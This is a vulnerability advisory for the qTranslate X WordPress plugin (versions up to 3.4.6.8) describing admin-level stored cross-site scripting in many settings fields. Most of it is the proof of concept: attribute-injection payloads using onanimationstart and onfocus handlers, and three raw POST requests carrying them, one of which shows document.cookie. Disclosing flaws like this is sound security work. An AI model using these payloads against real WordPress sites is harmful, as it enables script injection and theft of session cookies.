qTranslate X <= 3.4.6.8 – Multiple Admin+ Stored Cross-Site Scripting

Description

The plugin does not escape some of its settings before outputting them in attributes, allowing high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Proof of Concept

Affected POST Parameters:
- Settings > Languages > Languages: language_name, language_locale, language_locale_html, language_date_format, language_time_format
- Settings > Languages > Advanced: flag_location, filter_options, lsb_style_wrap_class, lsb_style_active_class, ignore_file_types
- Settings > Languages > Integration: custom_fields, custom_field_classes, text_field_filters

Put the following payload in one of the affected parameter: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
For the ignore_file_types parameter, the payload is "onfocus=alert(/XSS/)//

Raw requests:

POST /wp-admin/options-general.php?page=qtranslate-x&edit=de HTTP/1.1
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 912
Cookie: [admin+]

_wpnonce=a713656bc3&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dqtranslate-x%26edit%3Dde&original_lang=de&language_code=de&language_flag=de.png&language_name=Deutsch%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-Name%2F%29%2F%2F&language_locale=de_DE%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-Locale%2F%29%2F%2F&language_locale_html=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-LocFront%2F%29%2F%2F&language_date_format=%25A%2C+%5Cd%5Ce%5Cr+%25e.+%25B+%25Y%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-Date%2F%29%2F%2F&language_time_format=%25H%3A%25M%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-Time%2F%29%2F%2F&language_na_message=Leider%20ist%20der%20Eintrag%20nur%20auf%20%25LANG%3a%2c%20%3a%20und%20%25%20verfÃ¼gbar.&submit=Save+Changes+%C2%BB


POST /wp-admin/options-general.php?page=qtranslate-x HTTP/2
Cookie: [admin+]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1337

_wpnonce=f82918d645&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dqtranslate-x&default_language=en&url_mode=2&hide_default_language=1&show_displayed_language_prefix=1&camel_case=1&detect_browser_language=1&post_types_all%5Bpost%5D=1&post_types%5Bpost%5D=1&post_types_all%5Bpage%5D=1&post_types%5Bpage%5D=1&post_types_all%5Battachment%5D=1&post_types%5Battachment%5D=1&post_types_all%5Bcustom_css%5D=1&post_types%5Bcustom_css%5D=1&post_types_all%5Bcustomize_changeset%5D=1&post_types%5Bcustomize_changeset%5D=1&post_types_all%5Boembed_cache%5D=1&post_types%5Boembed_cache%5D=1&post_types_all%5Buser_request%5D=1&post_types%5Buser_request%5D=1&post_types_all%5Bwp_block%5D=1&post_types%5Bwp_block%5D=1&flag_location=plugins%2Fqtranslate-x%2Fflags%2F%22%2Bstyle%3Danimation-name%3Arotation%2Bonanimationstart%3Dalert%28origin%29%3B%2B%2F%2F&ignore_file_types=&header_css_on=1&header_css=&auto_update_mo=1&use_strftime=3&filter_options_mode=0&filter_options=blogname+blogdescription+widget_%25%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28origin%29%3B+%2F%2F&editor_mode=0&lsb_style_wrap_class=qtranxs-lang-switch-wrap%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28origin%29%3B+%2F%2F&lsb_style_active_class=active%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28origin%29%3B+%2F%2F&lsb_style=Simple_Buttons.css&highlight_mode=1&highlight_mode_custom_css=&json_config_files=.%2Fi18n-config.json&json_custom_i18n_config=&custom_fields=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28origin%29%3B+%2F%2F&custom_field_classes=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28origin%29%3B+%2F%2F&text_field_filters=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28origin%29%3B+%2F%2F&submit=Save+Changes&convert_database=none


POST /wp-admin/options-general.php?page=qtranslate-x HTTP/2
Cookie: [admin+]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1445

_wpnonce=f82918d645&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dqtranslate-x&default_language=en&url_mode=2&hide_default_language=1&show_displayed_language_prefix=1&camel_case=1&detect_browser_language=1&post_types_all%5Bpost%5D=1&post_types%5Bpost%5D=1&post_types_all%5Bpage%5D=1&post_types%5Bpage%5D=1&post_types_all%5Battachment%5D=1&post_types%5Battachment%5D=1&post_types_all%5Bcustom_css%5D=1&post_types%5Bcustom_css%5D=1&post_types_all%5Bcustomize_changeset%5D=1&post_types%5Bcustomize_changeset%5D=1&post_types_all%5Boembed_cache%5D=1&post_types%5Boembed_cache%5D=1&post_types_all%5Buser_request%5D=1&post_types%5Buser_request%5D=1&post_types_all%5Bwp_block%5D=1&post_types%5Bwp_block%5D=1&flag_location=plugins%2Fqtranslate-x%2Fflags%2F&ignore_file_types=%22onfocus=alert(document.cookie)%2F%2F&header_css_on=1&header_css=&auto_update_mo=1&use_strftime=3&filter_options_mode=0&filter_options=blogname+blogdescription+widget_%25&editor_mode=0&lsb_style_wrap_class=qtranxs-lang-switch-wrap&lsb_style_active_class=active&lsb_style=Simple_Buttons.css&highlight_mode=1&highlight_mode_custom_css=&json_config_files=.%2Fi18n-config.json&json_custom_i18n_config=&custom_fields=&custom_field_classes=&text_field_filters=&submit=Save+Changes&convert_database=none